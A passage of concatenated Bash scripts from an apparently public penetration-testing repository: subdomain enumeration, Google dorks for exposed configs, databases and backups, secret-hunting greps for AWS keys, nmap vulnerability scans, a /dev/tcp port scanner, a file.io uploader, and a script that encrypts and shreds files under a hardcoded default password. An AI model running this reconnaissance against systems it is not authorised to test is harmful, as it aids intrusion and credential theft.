assetfinder --subs-only $domain | anew subenum-$domain.txt || { 150 | [[ ${PARALLEL} == True ]] || { spinner "${bold}AssetFinder${end}" & 151 | PID="$!" 152 | } 153 | assetfinder --subs-only $domain > tmp-assetfinder-$domain 154 | kill ${PID} 2>/dev/null 155 | echo -e "$bold[*] AssetFinder$end: $(wc -l < tmp-assetfinder-$domain)" 156 | } 157 | } 158 | 159 | 160 | USE() { 161 | for i in $lu; do 162 | $i 163 | done 164 | OUT 165 | } 166 | 167 | 168 | EXCLUDE() { 169 | for i in ${list[@]}; do 170 | if [[ " ${le[@]} " =~ " ${i} " ]]; then 171 | continue 172 | else 173 | $i 174 | fi 175 | done 176 | OUT 177 | } 178 | 179 | OUT(){ 180 | [ "$silent" == False ] && { 181 | [ -n "$1" ] && out="$1" || out="$domain-$(date +'%Y-%m-%d').txt" 182 | sort -u tmp-* > $out 183 | echo -e $green"[+] The Final Results:$end $(wc -l $out)" 184 | [ $resolve == True ] && ALIVE "$out" "$domain" 185 | 186 | [ $delete == True ] && rm tmp-* 187 | } 188 | } 189 | 190 | 191 | ALIVE(){ 192 | [ "$silent" == False ] && printf "$bold[+] Resolving $end" 193 | printf " \r" 194 | cat $1 | httprobe -c $thread > "resolved-$2.txt" 195 | [ "$silent" == False ] && echo -e $green"[+] Resolved:$end $(wc -l < resolved-$2.txt)" 196 | 197 | } 198 | 199 | 200 | LIST() { 201 | lines=$(wc -l < $hosts) 202 | count=1 203 | while read domain; do 204 | [ "$silent" == False ] && echo -e "\n${Underlined}${bold}${green}[+] Domain ($count/$lines):${end} ${domain}" 205 | [ $prv == "a" ] && { 206 | [[ ${PARALLEL} == True ]] && { 207 | spinner "Reconnaissance" & 208 | PID="$!" 209 | export -f wayback crt bufferover Findomain Subfinder Amass Assetfinder spinner 210 | export domain silent bold end 211 | parallel ::: wayback crt bufferover Findomain Subfinder Amass Assetfinder 212 | kill ${PID} 213 | OUT 214 | } || { 215 | wayback 216 | crt 217 | bufferover 218 | Findomain 219 | Subfinder 220 | Amass 221 | Assetfinder 222 | OUT 223 | } 224 | } 225 | [ $prv == "e" ] && EXCLUDE 226 | [ $prv == "u" ] && USE 227 | let count+=1 228 | done < $hosts 229 | } 230 | 231 | Main() { 232 | [ $domain == False ] && [ $hosts == False ] && { echo -e $red"[-] Argument -d/--domain OR -l/--list is Required!"$end; Usage; } 233 | [ $use != False ] && [ $exclude != False ] && { echo -e $Underlined$red"[!] You can use only one Option: -e/--exclude OR -u/--use"$end; Usage; } 234 | [ $domain != False ] && { 235 | [ $use == False ] && [ $exclude == False ] && { 236 | [[ ${PARALLEL} == True ]] && { 237 | spinner "Reconnaissance" & 238 | PID="$!" 239 | export -f wayback crt bufferover Findomain Subfinder Amass Assetfinder spinner 240 | export domain silent bold end 241 | parallel ::: wayback crt bufferover Findomain Subfinder Amass Assetfinder 242 | kill ${PID} 243 | } || { 244 | wayback 245 | crt 246 | bufferover 247 | Findomain 248 | Subfinder 249 | Amass 250 | Assetfinder 251 | } 252 | [ "$out" == False ] && OUT || OUT $out 253 | } || { 254 | [ $use != False ] && USE 255 | [ $exclude != False ] && EXCLUDE 256 | } 257 | } 258 | [ "$hosts" != False ] && { 259 | [ $use != False ] && prv=u 260 | [ $exclude != False ] && prv=e 261 | [ $use == False ] && [ $exclude == False ] && prv=a 262 | LIST 263 | } 264 | } 265 | 266 | 267 | domain=False 268 | hosts=False 269 | use=False 270 | exclude=False 271 | silent=False 272 | delete=True 273 | out=False 274 | resolve=False 275 | thread=40 276 | PARALLEL=False 277 | 278 | list=( 279 | wayback 280 | crt 281 | bufferover 282 | Findomain 283 | Subfinder 284 | Amass 285 | Assetfinder 286 | ) 287 | 288 | while [ -n "$1" ]; do 289 | case $1 in 290 | -d|--domain) 291 | domain=$2 292 | shift ;; 293 | -l|--list) 294 | hosts=$2 295 | shift ;; 296 | -u|--use) 297 | use=$2 298 | lu=${use//,/ } 299 | for i in $lu; do 300 | if [[ ! " ${list[@]} " =~ " ${i} " ]]; then 301 | echo -e $red$Underlined"[-] Unknown Function: $i"$end 302 | Usage 303 | fi 304 | done 305 | shift ;; 306 | -e|--exclude) 307 | exclude=$2 308 | le=${exclude//,/ } 309 | for i in $le; do 310 | if [[ ! " ${list[@]} " =~ " ${i} " ]]; then 311 | echo -e $red$Underlined"[-] Unknown Function: $i"$end 312 | Usage 313 | fi 314 | done 315 | shift ;; 316 | -o|--output) 317 | out=$2 318 | shift ;; 319 | -s|--silent) 320 | silent=True ;; 321 | -k|--keep) 322 | delete=False ;; 323 | -r|--resolve) 324 | resolve=True ;; 325 | -t|--thread) 326 | thread=$2 327 | shift ;; 328 | -h|--help) 329 | Usage;; 330 | -p|--parallel) 331 | PARALLEL=True ;; 332 | -v|--version) 333 | echo "Version: $VERSION" 334 | exit 0 ;; 335 | *) 336 | echo "[-] Unknown Option: $1" 337 | Usage ;; 338 | esac 339 | shift 340 | done 341 | 342 | [ "$silent" == False ] && echo -e $blue$bold""" 343 | ____ _ _____ 344 | / ___| _ _| |__ | ____|_ __ _ _ _ __ ___ 345 | \___ \| | | | '_ \| _| | '_ \| | | | '_ \` _ \\ 346 | ___) | |_| | |_) | |___| | | | |_| | | | | | | 347 | |____/ \__,_|_.__/|_____|_| |_|\__,_|_| |_| |_| 348 | Subdomains Enumeration Tool 349 | By: bing0o @hack1lab 350 | """$end 351 | 352 | Main 353 | -------------------------------------------------------------------------------- /downlocal.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Download files from [Index Of] web pages 4 | # 5 | 6 | Usage="[+] Usage:\n \ 7 | \tdownlocal \n 8 | " 9 | 10 | [ -z $1 ] || [ $1 = "-h" ] && echo -e $Usage && exit 1 #{ echo "[-] Don't Forget The Argument"; echo "./donwlocal.sh "; exit 1; } 11 | 12 | printf -v begin '%(%s)T' -1 13 | 14 | 15 | 16 | 17 | down () { 18 | echo "[+] Download From: " $1 19 | curl -s $1 | grep href | awk -F'"' '{print $2}' | grep -v "/$" | xargs -I% bash -c "wget $1/% -q" 20 | } 21 | 22 | flist=() 23 | res=$(curl -s $1 | grep href | awk -F'"' '{print $2}' | grep "/$") 24 | 25 | for i in $res; do 26 | flist+=($i) 27 | done 28 | 29 | down "$1" 30 | 31 | #echo "$PWD" 32 | 33 | 34 | #[ ${#flist[@]} -ne 0 ] && { for dir in "${flist[@]}"; do cd "$PWD"; mkdir "$dir"; cd "$dir"; down "$1/$dir"; done } 35 | 36 | #echo "${listdir[@]}" 37 | 38 | printf -v end '%(%s)T' -1 39 | time=$[end - begin] 40 | 41 | min=$[time / 60] 42 | sec=$[time % 60] 43 | 44 | printf "\n#####################\n" 45 | printf "[+] Time: $min:$sec\n" 46 | printf "[+] Done!\n" 47 | printf "#####################\n" 48 | -------------------------------------------------------------------------------- /elastic.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | [ -z "$2" ] && { printf "eslatic.sh \n"; exit; } 4 | 5 | url=$1 6 | index=$2 7 | 8 | curl -sk "$url/$index/_search?size=10000" | jq "." 9 | -------------------------------------------------------------------------------- /encall.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #cito M:755 O:0 G:0 T:/usr/local/bin/crypto 3 | #---------------------------------------------------------------------------------- 4 | # A Bourne POSIX shell script acting as a wrapper for another written in Python, - 5 | # called 'crypto.py', available with the following: 6 | # 7 | # wget https://raw.githubusercontent.com/bing0o/Python-Scripts/master/crypto.py 8 | # chmod 755 crypto.py; chown 0:0 crypto.py 9 | # sudo mv crypto.py /usr/local/bin/crypto 10 | # 11 | # If you have Cito (https://github.com/terminalforlife/Extra): 12 | # 13 | # sudo cito -r bing0o Python-Scripts master crypto.py 14 | # 15 | # WARNING: Change the default password! 16 | #---------------------------------------------------------------------------------- 17 | #set -x 18 | #CurVer='2019-12-13' 19 | CurVer='2020-03-21' 20 | Progrm=${0##*/} 21 | 22 | Err(){ 23 | printf "ERROR: %s\n" "$2" 1>&2 24 | [ $1 -gt 0 ] && exit $1 25 | } 26 | 27 | Domain='https://github.com' 28 | 29 | Usage(){ 30 | while read -r CurLine; do 31 | printf "%b\n" "$CurLine" 32 | done <<-EOF 33 | \r ENCALL ($CurVer) 34 | \r Originally written by bing0o 35 | \r Revised by terminalforlife 36 | 37 | \r A simple Bourne POSIX wrapper for Python script Crypto. 38 | 39 | \rSYNTAX: $Progrm [OPTS] [FILE_1 [FILE_2] ...] 40 | 41 | \rOPTS: --help|-h|-? - Displays this help information. 42 | \r --version|-v - Output only the version datestamp. 43 | \r --encrypt|-e - Encrypts one or more files. 44 | \r --decrypt|-d - Decrypts one or more files. 45 | \r --password|-p STR - Where STR is the password to use. 46 | \r --depth|-t INT - Where INT is the Number of depth(Default:1). 47 | 48 | \rSITE: $Domain/bing0o/bash_scripting 49 | \r $Domain/bing0o/Python-Scripts 50 | EOF 51 | } 52 | 53 | Password='P4ssw@rD' 54 | 55 | if [ $# -eq 0 ]; then 56 | Usage; exit 1 57 | fi 58 | 59 | num=1 60 | 61 | while [ "$1" ]; do 62 | case $1 in 63 | --encrypt|-e) 64 | Action='-e' 65 | Actioning='Encrypting' ;; 66 | #shift ;; 67 | --decrypt|-d) 68 | Action='-d' 69 | Actioning='Decrypting' ;; 70 | #shift ;; 71 | --password|-p) 72 | shift 73 | if [ -z "$1" ]; then 74 | Err 1 "Password mising for the '--password|-p' option." 75 | else 76 | Password=$1 77 | fi ;; 78 | -t|--depth) 79 | num=$2 80 | shift ;; 81 | --help|-h|-\?) 82 | Usage; exit 0 ;; 83 | --version|-v) 84 | printf "%s\n" "$CurVer"; exit 0 ;; 85 | *) 86 | Usage; exit 1 ;; 87 | esac 88 | shift 89 | done 90 | 91 | if ! command -v crypto 1> /dev/null 2>&1; then 92 | Err 1 "Dependency 'crypto' not met." 93 | fi 94 | 95 | list=() 96 | path="." 97 | 98 | for i in $(seq 1 $num); do 99 | path=$path"/*" 100 | for i in $path; do 101 | if [ "$Action" = '-e' ]; then 102 | [ "${i##*.}" = 'hacklab' ] && continue 103 | elif [ "$Action" = '-d' ]; then 104 | [ "${i##*.}" = 'hacklab' ] || continue 105 | fi 106 | [ -f "$i" ] && list+=("$i") 107 | done 108 | done 109 | 110 | c=1 111 | all=${#list[@]} 112 | for CurFile in "${list[@]}"; do 113 | printf "[+] %s: %s\n" "$Actioning ($c/$all)" "$CurFile" 114 | crypto "$Action" "$CurFile" -p "$Password" 1>/dev/null 115 | # make the deleted file unrecoverable using shred. 116 | shred -n 10 -z --remove "${CurFile}" 117 | let c+=1 118 | done 119 | 120 | printf "[*] Done!\n" 121 | -------------------------------------------------------------------------------- /enumnom.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # enumnom.sh, Bash script to automate the Recon Process using tomnomnom's tools 4 | # the installation 5 | 6 | < domains 22 | results=$(wc -l domains) 23 | echo "[=+] Results: " $results 24 | 25 | echo -e "\n[+] Start HTTPRobe." 26 | cat domains | httprobe > hosts 27 | results=$(wc -l hosts) 28 | echo "[=+] Results: " $results 29 | 30 | echo -e "\n[+] Start Meg." 31 | meg -d 1000 -v / 32 | 33 | echo -e "\n[!] Changing The Directory To ./out" 34 | cd out 35 | 36 | 37 | # changed the name of `gf` to `gff` since I already have a linux tool called gf! 38 | echo -e "\n[*] The OutPut For aws-keys" 39 | gff aws-keys 40 | 41 | echo -e "\n[*] The OutPut For base64" 42 | gff base64 43 | 44 | echo -e "\n[*] The OutPut For cors" 45 | gff cors 46 | 47 | echo -e "\n[*] The OutPut For debug-pages" 48 | gff debug-pages 49 | 50 | echo -e "\n[*] The OutPut For firebase" 51 | gff firebase 52 | 53 | echo -e "\n[*] The OutPut For fw" 54 | gff fw 55 | 56 | echo -e "\n[*] The OutPut For go-functions" 57 | gff go-functions 58 | 59 | echo -e "\n[*] The OutPut For http-auth" 60 | gff http-auth 61 | 62 | echo -e "\n[*] The OutPut For ip" 63 | gff ip 64 | 65 | echo -e "\n[*] The OutPut For json-sec" 66 | gff json-sec 67 | 68 | #echo -e "\n[*] The OutPut For meg-headers" 69 | #gff meg-headers 70 | 71 | echo -e "\n[*] The OutPut For php-curl" 72 | gff php-curl 73 | 74 | echo -e "\n[*] The OutPut For php-errors" 75 | gff php-errors 76 | 77 | echo -e "\n[*] The OutPut For php-serialized" 78 | gff php-serialized 79 | 80 | echo -e "\n[*] The OutPut For php-sinks" 81 | gff php-sinks 82 | 83 | echo -e "\n[*] The OutPut For php-sources" 84 | gff php-sources 85 | 86 | echo -e "\n[*] The OutPut For s3-buckets" 87 | gff s3-buckets 88 | 89 | echo -e "\n[*] The OutPut For sec" 90 | gff sec 91 | 92 | echo -e "\n[*] The OutPut For servers" 93 | gff servers 94 | 95 | #echo -e "\n[*] The OutPut For strings" 96 | #gff strings 97 | 98 | echo -e "\n[*] The OutPut For takeovers" 99 | gff takeovers 100 | 101 | echo -e "\n[*] The OutPut For upload-fields" 102 | gff upload-fields 103 | 104 | #echo -e "\n[*] The OutPut For urls" 105 | #gff urls 106 | 107 | echo -e "\n[0] Done!" 108 | -------------------------------------------------------------------------------- /file-share.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | [ -z "$1" ] && { printf "[!] file-share \n" exit 1; } 4 | 5 | curl -F "file=@$1" https://file.io -s | sed 's/,/\n/g' | awk '/link/{gsub(/"/," ",$0); print $NF}' 6 | -------------------------------------------------------------------------------- /google-hacking.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Tool Used: https://github.com/dwisiswant0/go-dork 4 | # 5 | #[ -z "$1" ] && { printf "[!] google-hacking \n"; exit; } 6 | # 7 | # 8 | # ./google-hacking.sh target.com 9 | # $ cat targets.txt | ./google-hacking.sh 10 | # 11 | 12 | DORKS(){ 13 | dir="$ROOT/$1" 14 | mkdir "$dir" 15 | printf"Publicly exposed documents:\n" #Publicly exposed documents 16 | go-dork -q "site:$1 ext:doc | ext:docx | ext:odt | ext:rtf | ext:sxw | ext:psw | ext:ppt | ext:pptx | ext:pps | ext:csv" -s -nc -p 5 | tee "$dir/documents" 17 | 18 | #Directory listing vulnerabilities 19 | printf "Directory listing:\n" 20 | go-dork -q "site:$1 intitle:index.of /" -s -nc -p 5 | tee "$dir/dir-listing" 21 | 22 | printf "Configuration files exposed:\n" 23 | #Configuration files exposed 24 | go-dork -q "site:$1 ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:ini | ext:env" -s -nc -p 5 | tee "$dir/config-files" 25 | 26 | printf "Database files exposed:\n" 27 | #Database files exposed 28 | go-dork -q "site:$1 ext:sql | ext:dbf | ext:mdb" -s -nc -p 5 | tee "$dir/Databases" 29 | 30 | printf "Log files exposed:\n" 31 | #Log files exposed 32 | go-dork -q "site:$1 ext:log | ext:logs" -s -nc -p 5 | tee "$dir/log-files" 33 | 34 | #Backup and old files 35 | printf "Backup and old files:\n" 36 | go-dork -q "site:$1 ext:bkf | ext:bkp | ext:bak | ext:old | ext:backup" -s -nc -p 5 | tee "$dir/backups" 37 | 38 | #Login pages 39 | printf "Login pages:\n" 40 | go-dork -q "site:$1 inurl:login | inurl:signin | intitle:Login | intitle:\"sign in\" | inurl:auth" -s -nc -p 5 | tee "$dir/login-pages" 41 | 42 | #SQL errors 43 | printf "SQL errors:\n" 44 | go-dork -q "site:$1 intext:\"sql syntax near\" | intext:\"syntax error has occurred\" | intext:\"incorrect syntax near\" | intext:\"unexpected end of SQL command\" | intext:\"Warning: mysql_connect()\" | intext:\"Warning: mysql_query()\" | intext:\"Warning: pg_connect()\"" -s -nc -p 5 | tee "$dir/sqlErrors" 45 | 46 | #PHP errors / warnings 47 | printf "PHP errors / warnings:\n" 48 | go-dork -q "site:$1 \"PHP Parse error\" | \"PHP Warning\" | \"PHP Error\"" -s -nc -p 5 | tee "$dir/php-errors" 49 | 50 | #phpinfo() 51 | printf "phpinfo():\n" 52 | go-dork -q 'site:$1 ext:php intitle:phpinfo "published by the PHP Group"' -s -nc -p 5 | tee "$dir/phpinfo" 53 | 54 | #Search Pastebin.com / pasting sites 55 | printf "Search Pastebin.com / pasting sites:\n" 56 | go-dork -q 'site:pastebin.com | site:paste2.org | site:pastehtml.com | site:slexy.org | site:snipplr.com | site:snipt.net | site:textsnip.com | site:bitpaste.app | site:justpaste.it | site:heypasteit.com | site:hastebin.com | site:dpaste.org | site:dpaste.com | site:codepad.org | site:jsitor.com | site:codepen.io | site:jsfiddle.net | site:dotnetfiddle.net | site:phpfiddle.org | site:ide.geeksforgeeks.org | site:repl.it | site:ideone.com | site:paste.debian.net | site:paste.org | site:paste.org.ru | site:codebeautify.org | site:codeshare.io | site:trello.com "$1"' -s -nc -p 5 | tee "$dir/pastebin" 57 | 58 | #Search Github.com and Gitlab.com 59 | printf "Search Github.com and Gitlab.com:\n" 60 | go-dork -q 'site:github.com | site:gitlab.com "$1"' -s -nc -p 5 | tee "$dir/Gits" 61 | 62 | # Search Stackoverflow.com 63 | printf "Search Stackoverflow.com:\n" 64 | go-dork -q 'site:stackoverflow.com "$1"' -s -nc -p 5 | tee "$dir/stackoverflow" 65 | 66 | #Signup pages 67 | printf "Signup pages:\n" 68 | go-dork -q 'site:$1 inurl:signup | inurl:register | intitle:Signup' -s -nc -p 5 | tee "$dir/signups" 69 | 70 | #papaly bookmarks 71 | printf "papaly bookmarks:\n" 72 | go-dork -q 'site:papaly.com "$1"' -s -nc -p 5 | tee "$dir/papaly" 73 | 74 | 75 | #go-dork -q 'site:$1 ' -s -nc -p 5 76 | 77 | } 78 | 79 | ROOT="google-hacking" 80 | mkdir $ROOT 81 | 82 | [ -z "$1" ] && while read site; do DORKS "$site"; done || DORKS "$1" 83 | -------------------------------------------------------------------------------- /lf.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # 3 | # just a Bourne POSIX shell script to list directories or files in the given path 4 | # 5 | 6 | Usage () { 7 | while read -r CurLine; do 8 | printf '%b\n' "$CurLine" 9 | done <<-EOF 10 | \r#Usage: 11 | \r lf 12 | \r d For Directories 13 | \r f For Files 14 | \r L For Symbolic Links 15 | \r p For Named Pipes 16 | \r S For Sockets 17 | \r b For Block Special Files 18 | EOF 19 | } 20 | 21 | case $1 in 22 | [fdLpSb]) Type=$1 ;; 23 | *) Usage; exit 1 ;; 24 | esac 25 | 26 | for CurFile in ${2:-.}/.* ${2:-.}/* ; do 27 | case $CurFile in 28 | .|..|*/.|*/..) continue ;; 29 | esac 30 | 31 | [ -$Type "$CurFile" ] && printf '%s\n' "${CurFile#./}" 32 | done 33 | -------------------------------------------------------------------------------- /monitor.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | cpu=$(awk '/^cpu/ {usage=($2+$4)*100/($2+$4+$5)} END{printf("%d\n", usage)}' /proc/stat) 4 | [ $cpu -ge 80 ] && notify-send -u critical "High CPU usage: ${cpu}%" 5 | 6 | free -m | while read Type Total Used Free _; do 7 | if [ "$Type" = 'Mem:' ]; then 8 | PCent=$((Used*100/Total)) 9 | 10 | [ $PCent -ge 80 ] && notify-send -u critical "High RAM usage: ${PCent}%" 11 | fi 12 | done 13 | 14 | # Bourne POSIX-compliant approach. 15 | df -P / | while read F1 _ _ _ F5 _; do 16 | if ! [ "$F1" = 'Filesystem' ]; then 17 | PCent=${F5%\%} 18 | 19 | [ $PCent -ge 80 ] && notify-send -u critical "High DISK usage: ${PCent}%" 20 | 21 | # In-case there are for some reason >1 matches. 22 | break 23 | fi 24 | done 25 | 26 | # In-case we're running in a cron job. 27 | exit 0 28 | -------------------------------------------------------------------------------- /music.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # bash script to pick a music for you from the given directory. 4 | # Just For Fun [^^] 5 | # 6 | # chmod 755 music.sh 7 | # sudo cp music.sh /usr/local/bin/music 8 | # 9 | 10 | #set -x 11 | 12 | cyan="\e[36m" 13 | end="\e[0m" 14 | 15 | MUSIC () { 16 | pick=${music[$num]} 17 | 18 | echo -e $cyan"\n[+] The Songs: "$end ${#music[@]} 19 | echo -e $cyan"[+] The Picked Number: "$end $num 20 | echo -e $cyan"[+] The Picked Song: "$end ${pick##*/} 21 | 22 | pkill vlc 23 | 24 | case $vlc in 25 | True) vlc "$pick" &>/dev/null & ;; 26 | *) cvlc "$pick" --play-and-exit &>/dev/null & ;; 27 | esac 28 | } 29 | 30 | prog=${0##*/} 31 | 32 | Usage() { 33 | while read -r line; do 34 | printf "%b\n" "$line" 35 | done <<-EOF 36 | 37 | \r #Options: 38 | \r \t -p, --path\t\t The Path To Your Music Directory. 39 | \r \t -e, --extension\t The Extension of The Files (mp3, mp4, avi,....etc, or "*" to load all the files). 40 | \r \t -v, --vlc\t\t to run the music or the video clip with vlc GUI. 41 | \r \t -l, --list\t\t to list all the songs and pick the music by yourself. 42 | \r #Example: 43 | \r \t $prog -p $HOME/Music -e mp3 -v -l 44 | 45 | EOF 46 | } 47 | 48 | # change the default path here! 49 | path="$HOME/Music" 50 | ext="mp3" 51 | vlc=False 52 | list=False 53 | 54 | while [ -n "$1" ]; do 55 | case "$1" in 56 | -p|--path) 57 | path=$2 58 | shift;; 59 | -e|--extension) 60 | ext=$2 61 | shift;; 62 | -v|--vlc) 63 | vlc=True;; 64 | #shift;; 65 | -l|--list) 66 | list=True;; 67 | #shift;; 68 | *) 69 | Usage 70 | exit 1;; 71 | esac 72 | shift 73 | done 74 | 75 | 76 | m=0 77 | for i in "$path"/*."$ext"; do 78 | [ -f "$i" ] && music[$m]=$i 79 | [ $list == True ] && echo "[$m] ${i##*/}" 80 | let m+=1 81 | done 82 | 83 | 84 | [ $list == True ] && read -p "[+] Pick a Song: " num || num=$[ $RANDOM % $m ] 85 | 86 | MUSIC 87 | -------------------------------------------------------------------------------- /mynmap.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Simple bash script to run nmap against a list of hosts or IPs 4 | # 5 | 6 | 7 | PRG=${0##*/} 8 | VERSION="2020-05-25" 9 | 10 | Usage(){ 11 | while read -r line; do 12 | printf "%b\n" "$line" 13 | done <<-EOF 14 | \r$PRG:\t\t - run nmap against a list of hosts or IPs. 15 | \r 16 | \rOptions: 17 | \r -l, --list - List of Domains or IPs. 18 | \r -o, --output - The output Directory to save the results. 19 | \r -p, --ports - List of Ports (Default:20 ports). 20 | \r (7001,9200,6443,2379,10250,10255,2082,2087,2095,2096,3000,8000,8001,8008,8080,8083,81,8443,8834,8888) 21 | \r -h, --help - Displays this Informations and Exit. 22 | \r -v, --version - Displays The Version 23 | \rExample: 24 | \r $PRG -l domains.txt -t 20 -o status.txt 25 | \r 26 | 27 | EOF 28 | } 29 | 30 | 31 | list=False 32 | out=nmap-results 33 | ports="7001,9200,6443,2379,10250,10255,2082,2087,2095,2096,3000,8000,8001,8008,8080,8083,81,8443,8834,8888" 34 | 35 | while [ -n "$1" ]; do 36 | case $1 in 37 | -l|--list) 38 | [ -z "$2" ] && { printf "[-] -l/--list needs a File (list of Domains or IPs)\n"; exit 1; } 39 | list=$2 40 | shift ;; 41 | -o|--output) 42 | [ -z "$2" ] && { printf "[-] -o/--output needs a Directory to write the results to.\n"; exit 1; } 43 | out=$2 44 | shift ;; 45 | -p|--ports) 46 | [ -z "$2" ] && { printf "[-] -p/--ports, ports e.g(80,443,8080,8443)\n"; exit 1; } 47 | ports=$2 48 | shift ;; 49 | -h|--help) 50 | Usage 51 | exit ;; 52 | -v|--version) 53 | printf "$VERSION\n" 54 | exit ;; 55 | *) 56 | printf "[-] Error: Unknown Options: $1\n" 57 | Usage; exit 1 ;; 58 | esac 59 | shift 60 | done 61 | 62 | 63 | Main() { 64 | all=$(wc -l < $list) 65 | count=1 66 | while read host 67 | do 68 | printf "[$count/$all]" 69 | printf " \r" 70 | nmap $host -Pn -p $ports -oN $out/$host -T4 &>/dev/null 71 | let count+=1 72 | done < $list 73 | } 74 | 75 | 76 | [ "$list" == False ] && { 77 | printf "[!] Argument -l/--list is Required!\n" 78 | Usage 79 | exit 1 80 | } || { 81 | [ -d "$out" ] || mkdir $out 82 | Main 83 | } 84 | -------------------------------------------------------------------------------- /mywhois.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | [ -z $1 ] && { printf "[!] Usage: whois \n"; exit 1; } 4 | 5 | curl -sk "https://www.whoisxmlapi.com/whoisserver/WhoisService?apiKey=API_KEY&gnoreRawTexts=1&outputFormat=json&domainName=$1" | gron | grep -v "rawText\|strippedText" | grep "registrant" | grep "name\|email\|organization" 6 | -------------------------------------------------------------------------------- /naabu-to-nmap.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # use naabu for full port scan then go deeper with each port using nmap 4 | # https://github.com/projectdiscovery/naabu 5 | # 6 | [ -z "$1" ] && { printf "[!] Usage: ./naabu-to-nmap.sh \n"; exit; } 7 | 8 | [ -d "nmap-results" ] || mkdir "nmap-results" 9 | 10 | 11 | E8080=False # Exclude port 8080 from the scan 12 | E8443=False # Exclude port 8443 from the scan 13 | 14 | C8080=$(cat $1 | grep ':8080$' | wc -l) # Count Port 8080 15 | C8443=$(cat $1 | grep ':8443$' | wc -l) # Count Port 8443 16 | 17 | Exclude=() 18 | 19 | [[ ${C8080} -ge 20 ]] && Exclude+=("8080") #E8080=True 20 | [[ ${C8443} -ge 20 ]] && Exclude+=("8443") #E8443=True 21 | 22 | list=$(cat "$1" | cut -d ':' -f 1 | sort -u) 23 | 24 | all=() 25 | 26 | for i in ${list[@]} 27 | do 28 | all+=("$i") 29 | done 30 | 31 | length=${#all[@]} 32 | 33 | count=1 34 | for IP in ${list[@]} 35 | do 36 | printf "[+] [$count/$length] Scanning: ${IP} " 37 | printf " \r" 38 | ports=$(cat "$1" | sort -u | grep "^${IP}" | cut -d ":" -f 2) 39 | 40 | for i in ${Exclude[@]} 41 | do 42 | ports=${ports[@]/$i} # Delete The Excluded Port From The List of Ports 43 | done 44 | 45 | ports=$(echo $ports | tr ' ' ',' ) 46 | nmap --script default,vuln -sV -T4 "$IP" -p "$ports" -oN "nmap-results/$IP" --open -Pn &>/dev/null # Run nmap scan with the (default and vuln) scripts. 47 | let count+=1 48 | done 49 | -------------------------------------------------------------------------------- /netspace.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # shell script to create a linux network namespace with internet access 4 | # 5 | 6 | PRG=${0##*/} 7 | 8 | Usage(){ 9 | while read -r line; do 10 | printf "%b\n" "$line" 11 | done <<-EOF 12 | \r#Options: 13 | \r -n, --name - Name For New Namespace. 14 | \r -v, --veth - Veth name. 15 | \r -p, --peer - Peer name. 16 | \r -i, --interface - Network Interface (Default: eth0). 17 | \r --vip - IP For Veth. 18 | \r --pip - IP For Peer. 19 | \r -h, --help - Shows The Help Message. 20 | \r#Example: 21 | \r $PRG --name vpn --veth veth0 --peer peer0 --interface eth0 --vip 10.0.1.1 --pip 10.0.1.2 22 | EOF 23 | } 24 | 25 | ns="vpn" 26 | VETH="veth-0" 27 | PEER="peer-0" 28 | VIP="10.0.1.1" 29 | PIP="10.0.1.2" 30 | IFACE="eth0" 31 | 32 | while [ -n "$1" ]; do 33 | case $1 in 34 | -n|--name) 35 | ns="$2" 36 | shift ;; 37 | -v|--veth) 38 | VETH="$2" 39 | shift ;; 40 | -p|--peer) 41 | PEER="$2" 42 | shift ;; 43 | --vip) 44 | VIP="$2" 45 | shift ;; 46 | --pip) 47 | PIP="$2" 48 | shift ;; 49 | -i|--interface) 50 | IFACE="$2" 51 | shift ;; 52 | -h|--help) 53 | Usage 54 | exit 55 | ;; 56 | *) 57 | echo "[-] Unknown Option: $1" 58 | Usage 59 | exit 1 60 | ;; 61 | esac 62 | shift 63 | done 64 | 65 | 66 | # creating new network namespace 67 | ip netns add ${ns} 68 | 69 | # setting loopback interface up 70 | ip netns exec ${ns} ip link set lo up 71 | 72 | # Creating a veth pair 73 | ip link add ${VETH} type veth peer name ${PEER} 74 | 75 | # moving veth-1 to our new namespace 76 | ip link set ${PEER} netns ${ns} 77 | 78 | # Assigning IPs to our veth devices 79 | ip addr add ${VIP}/24 dev ${VETH} 80 | ip netns exec ${ns} ip addr add ${PIP}/24 dev ${PEER} 81 | 82 | # bring them up 83 | ip link set ${VETH} up 84 | ip netns exec ${ns} ip link set ${PEER} up 85 | 86 | # checking if IPv4 Forwarding is enabled and enabling it if it's not. 87 | sysctl -a 2>/dev/null | grep 'ip_forward ' | grep "1$" || echo 1 > /proc/sys/net/ipv4/ip_forward 88 | 89 | # Packet forwarding with iptables 90 | iptables -A FORWARD -o ${IFACE} -i ${VETH} -j ACCEPT 91 | iptables -A FORWARD -o ${VETH} -i ${IFACE} -j ACCEPT 92 | 93 | # IP Masquerading 94 | iptables -t nat -A POSTROUTING -s ${PIP}/24 -o ${IFACE} -j MASQUERADE 95 | 96 | # Default gateway for the new namespace 97 | ip netns exec ${ns} ip route add default via ${VIP} 98 | 99 | # setting DNS server for the new namespace 100 | [[ -d /etc/netns/${ns} ]] || mkdir -p /etc/netns/${ns} 101 | echo 'nameserver 8.8.8.8' > /etc/netns/${ns}/resolv.conf 102 | 103 | # running curl to check if new netns can access the internet 104 | ip netns exec ${ns} curl ipinfo.io || echo "[-] The new network namespace can not access the internet, check The Configuration!" 105 | -------------------------------------------------------------------------------- /port.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | red="\e[31m" 4 | green="\e[32m" 5 | end="\e[0m" 6 | 7 | [ -z $1 ] && { echo -e "#Usage:\n\tport "; exit; } 8 | 9 | IP=$1 10 | 11 | SCAN () { 12 | (echo 1 > /dev/tcp/$IP/$1) 2>/dev/null 13 | [ 